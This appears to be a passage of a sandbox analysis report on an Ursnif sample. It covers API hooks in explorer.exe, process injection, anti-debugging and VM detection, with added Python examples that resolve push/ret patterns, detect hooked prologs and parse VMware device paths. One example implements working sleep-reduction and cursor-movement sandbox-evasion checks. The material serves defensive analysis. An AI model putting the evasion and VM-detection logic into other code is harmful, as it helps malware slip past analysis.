Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00458B58 push 00458B90h; ret 0_2_00458B88
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0040CB64 push ecx; mov dword ptr [esp], edx 0_2_0040CB69
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00428B2C push 00428B64h; ret 0_2_00428B5C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00428BC0 push 00428BECh; ret 0_2_00428BE4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00458BD4 push 00458C00h; ret 0_2_00458BF8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00458B9C push 00458BC8h; ret 0_2_00458BC0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00458C0C push 00458C32h; ret 0_2_00458C2A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0042EC2C push ecx; mov dword ptr [esp], edx 0_2_0042EC30
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00428CF0 push 00428D1Ch; ret 0_2_00428D14
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00426CF4 push 00426D32h; ret 0_2_00426D2A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00428C90 push 00428CC3h; ret 0_2_00428CBB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00406CA0 push 00406CCCh; ret 0_2_00406CC4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00428D40 push 00428D83h; ret 0_2_00428D7B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00426D74 push 00426DACh; ret 0_2_00426DA4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00402D00 push eax; ret 0_2_00402D3C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00454D10 push 00454D8Dh; ret 0_2_00454D85
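Two patterns are listed under this signature: "push imm32 ... ret", which transfers control to the pushed address without a visible jmp, and "push ecx; mov dword ptr [esp], reg", which is just "push reg" spelled in two instructions. A caveat before treating either as deliberate obfuscation: in every push/ret hit above the pushed address is exactly eight bytes past the ret (for example ret at 0x00453EE5, target 0x00453EED), which is the layout the Delphi compiler emits for a try/finally block (push @exit; finally body; ret; jmp @HandleFinally; jmp @finally; @exit:), and the IsIconic/GetWindowPlacement/SetWindowPos call chains elsewhere in this report are likewise VCL form code. The resolver below is an added example, not code from the report or from the sample: it is a byte-pattern scan, not a disassembler, over a constructed buffer assumed to start at 0x00453EE0 (the report gives only the function start and the ret address), and it rewrites both patterns into their plain meaning while tagging the ret+8 case as compiler-generated:

```python
import struct

# Constructed bytes modelled on the report line
#   "0_2_00453E60 push 00453EEDh; ret 0_2_00453EE5".
# The slice is assumed to begin at 0x00453EE0; the bytes between ret and the pushed
# address reproduce the Delphi finally epilogue (jmp rel32; jmp short) so that the
# target lands at ret + 8 as it does in the report.
BASE = 0x00453EE0
CODE = bytes.fromhex(
    "68 ED 3E 45 00"   # 0x453EE0: push 0x00453EED
    "C3"               # 0x453EE5: ret  -> branches to the pushed address
    "E9 00 00 00 00"   # 0x453EE6: jmp rel32 (jmp @HandleFinally in Delphi codegen)
    "EB F8"            # 0x453EEB: jmp short (jmp @finally)
    "C3"               # 0x453EED: the push/ret target, ret + 8
    "51 89 14 24"      # 0x453EEE: push ecx ; mov [esp], edx  == push edx
)

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def resolve_push_ret(code, base):
    """Scan for the two patterns and return (address, kind, detail) tuples.

    kind is 'compiler_finally' when the pushed address is ret+8 (Delphi try/finally
    layout), 'obfuscated_jmp' for any other push/ret pair, and 'push' for the
    push ecx; mov [esp], r32 idiom, with detail = the register actually pushed.
    """
    out = []
    i = 0
    while i < len(code):
        b = code[i]
        if b == 0x68 and i + 5 <= len(code):                 # push imm32
            target = struct.unpack_from("<I", code, i + 1)[0]
            j = code.find(b"\xC3", i + 5)                      # next ret byte
            if j != -1:
                ret_addr = base + j
                kind = "compiler_finally" if target - ret_addr == 8 else "obfuscated_jmp"
                out.append((base + i, kind, target))
                i = j + 1
                continue
        if (b == 0x51 and i + 4 <= len(code) and code[i + 1] == 0x89
                and code[i + 3] == 0x24 and code[i + 2] & 0xC7 == 0x04):
            # 51 = push ecx ; 89 /r with mod=00 rm=100 SIB=24 = mov [esp], r32
            out.append((base + i, "push", REG32[(code[i + 2] >> 3) & 7]))
            i += 4
            continue
        i += 1
    return out


if __name__ == "__main__":
    for addr, kind, detail in resolve_push_ret(CODE, BASE):
        print(f"{addr:08X}: {kind} {detail:08X}" if isinstance(detail, int)
              else f"{addr:08X}: {kind} {detail}")
```

Because the scan looks for the next 0xC3 byte rather than decoding instructions, it can be fooled by a 0xC3 inside an immediate or displacement; for anything beyond triage, run the same classification on the output of a real disassembler.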

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.704190908.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704338669.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.881249179.0000000000146000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.804269082.0000000004B5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704231467.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704303673.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.1038694426.0000027D4F836000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704163545.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.880565935.0000000001060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1047039764.0000000004DD6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.868598752.000001EB11270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704264515.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704123248.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.877735219.00000000030F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704325242.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5964, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4552, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
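The four hook findings above are the same observation made in three places: inside explorer.exe the bot has redirected CreateProcessW/CreateProcessAsUserW (and RegGetValueW, to hide its own keys) by rewriting an IAT slot, an EAT entry and the first bytes of the function body. The checker below is an added example, not code from the report; it shows the prolog comparison a memory scanner performs, taking a clean reference prolog (in practice mapped from the on-disk kernel32.dll) and a live copy read from the target process, and classifying the detour. The prolog bytes, the function address and the trampoline address are constructed; the six bytes the report prints for the patched CreateProcessAsUserW are not decoded here. The IAT/EAT checks are the same idea applied to pointer slots: resolve the export from the clean mapping and compare it with the slot value.

```python
import struct

# Constructed 64-bit data: a typical kernel32 export prolog, the address it is assumed to
# sit at, and a hypothetical trampoline address the hook redirects to.
FUNC_ADDR = 0x7FFABB035200
CLEAN = bytes.fromhex("48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20")
HOOK_TARGET = 0x7FFABB03521C


def jmp_rel32(src, dst):
    """E9 rel32: target = next_ip + rel32, the detour most inline hooks write."""
    return b"\xE9" + struct.pack("<i", dst - (src + 5))


def jmp_abs_rip(dst):
    """FF 25 00000000 + qword: jmp [rip+0] with the absolute target stored inline."""
    return b"\xFF\x25" + b"\x00" * 4 + struct.pack("<Q", dst)


# Two hooked variants of the same prolog, each overwriting the first bytes in place.
HOOKED_E9 = jmp_rel32(FUNC_ADDR, HOOK_TARGET) + CLEAN[5:]
HOOKED_FF25 = jmp_abs_rip(HOOK_TARGET) + CLEAN[14:]


def classify_prolog(clean, live, addr):
    """Compare the live prolog with the clean reference.

    Returns None when untouched, otherwise (kind, target) where target is the
    resolved detour destination or None if the patch is not a recognised jump.
    """
    if live[:len(clean)] == clean:
        return None
    if live[0] == 0xE9:                                   # jmp rel32
        return ("jmp_rel32", addr + 5 + struct.unpack_from("<i", live, 1)[0])
    if live[:2] == b"\xFF\x25":                          # jmp [rip+disp32]
        disp = struct.unpack_from("<i", live, 2)[0]
        slot = 6 + disp                                   # offset of the pointer in 'live'
        if 0 <= slot and slot + 8 <= len(live):
            return ("jmp_abs", struct.unpack_from("<Q", live, slot)[0])
        return ("jmp_abs", None)
    if live[:2] == b"\x48\xB8" and live[10:12] == b"\xFF\xE0":   # mov rax, imm64; jmp rax
        return ("mov_rax_jmp", struct.unpack_from("<Q", live, 2)[0])
    if live[0] == 0x68 and len(live) > 5 and live[5] == 0xC3:   # push imm32; ret
        return ("push_ret", struct.unpack_from("<I", live, 1)[0])
    return ("unknown_patch", None)


if __name__ == "__main__":
    for label, live in (("clean", CLEAN), ("e9", HOOKED_E9), ("ff25", HOOKED_FF25)):
        print(label, classify_prolog(CLEAN, live, FUNC_ADDR))
```

A detour whose target falls outside any module backed by a file on disk (here explorer.exe with injected Ursnif code) is the signal; hot patching by legitimate EDR or compatibility shims lands in a signed, file-backed module, so resolve the target to its owning region before raising it.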
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_004363F8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 0_2_004363F8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0044E8A4 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 0_2_0044E8A4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0044F1C8 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 0_2_0044F1C8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_004393D0 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 0_2_004393D0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00425390 IsIconic,GetWindowPlacement,GetWindowRect, 0_2_00425390
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00439AF0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 0_2_00439AF0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00439BA0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 0_2_00439BA0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0044DFF0 IsIconic,GetCapture, 0_2_0044DFF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_004363F8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 1_2_004363F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0044E8A4 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 1_2_0044E8A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0044F1C8 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 1_2_0044F1C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_004393D0 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_004393D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_00425390 IsIconic,GetWindowPlacement,GetWindowRect, 1_2_00425390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_00439AF0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 1_2_00439AF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_00439BA0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 1_2_00439BA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0044DFF0 IsIconic,GetCapture, 1_2_0044DFF0
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0042743C LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0042743C
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Disables application error messages (SetErrorMode)
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (3 identical entries)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (20 identical entries)
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (89 identical entries)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX (26 identical entries)
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX (2 identical entries)
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0042DDB8 0_2_0042DDB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0042DDB8 1_2_0042DDB8
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
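The string queried by the injected control.exe is a device-interface path: enumerator, device identifier with Ven_/Prod_ fields, instance id and the interface class GUID, separated by '#'. The vendor field NECVMWar and the product field VMware_SATA_CD00 are what give the VMware guest away, which is why sandbox builds patch these strings. The parser below is an added example, not code from the report or the sample; it splits such a path into its fields, names the interface class for the three well-known storage GUIDs, and reports the hypervisor markers found in the vendor/product text. The path from the report is used as-is; the second, clean-looking disk path is constructed for contrast.

```python
import re
from dataclasses import dataclass

# Well-known storage device-interface class GUIDs from the Windows SDK headers.
INTERFACE_GUIDS = {
    "53f56307-b6bf-11d0-94f2-00a0c91efb8b": "GUID_DEVINTERFACE_DISK",
    "53f56308-b6bf-11d0-94f2-00a0c91efb8b": "GUID_DEVINTERFACE_CDROM",
    "53f5630d-b6bf-11d0-94f2-00a0c91efb8b": "GUID_DEVINTERFACE_VOLUME",
}
# Substrings in vendor/product fields that identify a hypervisor (matched lower-cased).
VM_MARKERS = ("vmware", "vmwar", "vbox", "virtualbox", "qemu", "xen", "virtual")

SAMPLE_PATH = ("SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000"
               "#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}")            # from the report
BENIGN_PATH = ("SCSI#Disk&Ven_SAMSUNG&Prod_SSD_860_EVO#4&1a2b3c4d&0&000000"
               "#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}")            # constructed

PATH_RE = re.compile(
    r"^(?:\\\\\?\\)?(?P<enum>[^#]+)#(?P<devid>[^#]+)#(?P<inst>[^#]+)#\{(?P<guid>[0-9a-f-]{36})\}$",
    re.I)


@dataclass(frozen=True)
class DevicePath:
    enumerator: str
    device_class: str
    vendor: str
    product: str
    instance: str
    interface: str


def parse_device_path(path):
    """Split a device-interface symbolic link (with or without the \\?\ prefix)."""
    m = PATH_RE.match(path)
    if not m:
        raise ValueError(f"not a device interface path: {path!r}")
    fields = m["devid"].split("&")            # CdRom, Ven_..., Prod_..., optionally Rev_...
    kv = {}
    for f in fields[1:]:
        key, _, val = f.partition("_")        # first underscore separates key and value
        kv[key.lower()] = val
    guid = m["guid"].lower()
    return DevicePath(m["enum"].upper(), fields[0], kv.get("ven", ""), kv.get("prod", ""),
                      m["inst"], INTERFACE_GUIDS.get(guid, guid))


def vm_markers(dev):
    """Return the sorted list of hypervisor markers present in vendor/product."""
    hay = f"{dev.vendor} {dev.product}".lower().replace("_", " ")
    return sorted({marker for marker in VM_MARKERS if marker in hay})


if __name__ == "__main__":
    for p in (SAMPLE_PATH, BENIGN_PATH):
        d = parse_device_path(p)
        print(d.enumerator, d.device_class, d.vendor, d.product, d.interface, vm_markers(d))
```

Note that the interface GUID on the report's path is the volume class, not the CD-ROM class, even though the device id says CdRom; the malware reaches the vendor string through whichever interface enumerates first, so masking only the CD-ROM interface name is not enough.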
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Windows\System32\loaddll32.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 0_2_00438940
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 1_2_00438940
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3210
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5658
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.dll
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0042DDB8 0_2_0042DDB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0042DDB8 1_2_0042DDB8
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3040 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\explorer.exe TID: 5932 Thread sleep time: -1667865539s >= -30000s
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_004051E8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_004051E8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F37AA8 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_02F37AA8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_004051E8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 1_2_004051E8
Source: C:\Windows\explorer.exe Code function: 37_2_04DBA0C4 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 37_2_04DBA0C4
Source: C:\Windows\explorer.exe Code function: 37_2_04DBEEAC FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW, 37_2_04DBEEAC
Source: C:\Windows\explorer.exe Code function: 37_2_04DB537C FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindClose,RtlDeleteBoundaryDescriptor,RtlReleasePrivilege, 37_2_04DB537C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00421078 GetSystemInfo, 0_2_00421078
Source: WerFault.exe, 00000004.00000002.661025172.00000000050B0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 00000004.00000003.659310878.0000000004FDE000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: mshta.exe, 0000001D.00000003.822853558.000001BC04ECE000.00000004.00000001.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
Source: WerFault.exe, 00000004.00000002.661025172.00000000050B0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 00000004.00000002.661025172.00000000050B0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WerFault.exe, 00000004.00000003.659596838.000000000509F000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW}
Source: WerFault.exe, 00000004.00000002.661025172.00000000050B0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation
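The sleep-reduction and cursor-movement checks flagged in this section both work the same way: the sample asks the OS for something (a delay, a cursor position) and then checks whether the answer is consistent with a real user's machine. The block below is an added illustration written for this page, not code from the sample or from the sandbox: it implements the two checks with the clock, sleep and cursor sources injected, plus a constructed fake environment that models an honest host and a sleep-skipping sandbox so the logic runs offline. Function and class names are ours.

```python
"""Sandbox-evasion probes of the kind flagged above (sleep-reduction and
mouse-movement checks), with the timing, sleep and cursor sources
injectable so the logic is testable offline. Added illustration; not code
from the analysed sample."""
import time


def sleep_was_shortened(sleep_ms, sleep=time.sleep, clock=time.monotonic,
                        tolerance=0.5):
    """True if a requested sleep returned in less than `tolerance` of the
    requested time, as measured by an independent clock.

    Native equivalent: GetTickCount(); Sleep(n); GetTickCount(). A sandbox
    that patches Sleep to return at once but leaves the tick counter alone
    is caught here, which is why sleep-skipping must also advance every
    clock the sample can read (tick count, QPC, system time) consistently."""
    start = clock()
    sleep(sleep_ms / 1000.0)
    elapsed_ms = (clock() - start) * 1000.0
    return elapsed_ms < sleep_ms * tolerance


def cursor_never_moved(get_cursor_pos, samples=3, interval_ms=100,
                       sleep=time.sleep):
    """Poll the cursor `samples` times; True if it never changed.
    Mirrors the GetCursorPos / WaitForSingleObject loop noted above."""
    first = get_cursor_pos()
    for _ in range(samples - 1):
        sleep(interval_ms / 1000.0)
        if get_cursor_pos() != first:
            return False
    return True


class FakeEnvironment:
    """Constructed stand-in for the OS so the probes run deterministically.
    skip_sleeps=True models a sandbox that fast-forwards sleeps without
    advancing its clock; cursor_path is the sequence of positions returned
    by successive GetCursorPos calls (last one repeats)."""

    def __init__(self, skip_sleeps=False, cursor_path=((0, 0),)):
        self.now = 0.0
        self.skip_sleeps = skip_sleeps
        self.cursor_path = list(cursor_path)
        self.calls = 0

    def clock(self):
        return self.now

    def sleep(self, seconds):
        # An honest system advances the clock by the full sleep; a
        # sleep-skipping sandbox advances it by almost nothing.
        self.now += 0.001 if self.skip_sleeps else seconds

    def cursor_pos(self):
        pos = self.cursor_path[min(self.calls, len(self.cursor_path) - 1)]
        self.calls += 1
        return pos


def probe(env):
    """Run both checks against an environment; returns the verdicts."""
    return {
        "sleep_shortened": sleep_was_shortened(2000, sleep=env.sleep,
                                               clock=env.clock),
        "cursor_static": cursor_never_moved(env.cursor_pos, sleep=env.sleep),
    }


if __name__ == "__main__":
    print("sleep-skipping sandbox:", probe(FakeEnvironment(skip_sleeps=True)))
    print("user at the keyboard:  ",
          probe(FakeEnvironment(cursor_path=[(10, 10), (12, 15), (30, 40)])))
```

Both verdicts being True is the profile the sample is looking for. The practical lesson for a sandbox operator is that each trick has to be defeated consistently: shortening sleeps without moving every clock, or simulating a user without ever moving the cursor, leaves exactly the discrepancy these probes measure.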

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_00447EB0 LdrInitializeThunk, 1_2_00447EB0
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0042743C LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0042743C
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\loaddll32.exe Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Windows\System32\loaddll32.exe Memory allocated: C:\Windows\System32\control.exe base: 1B0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
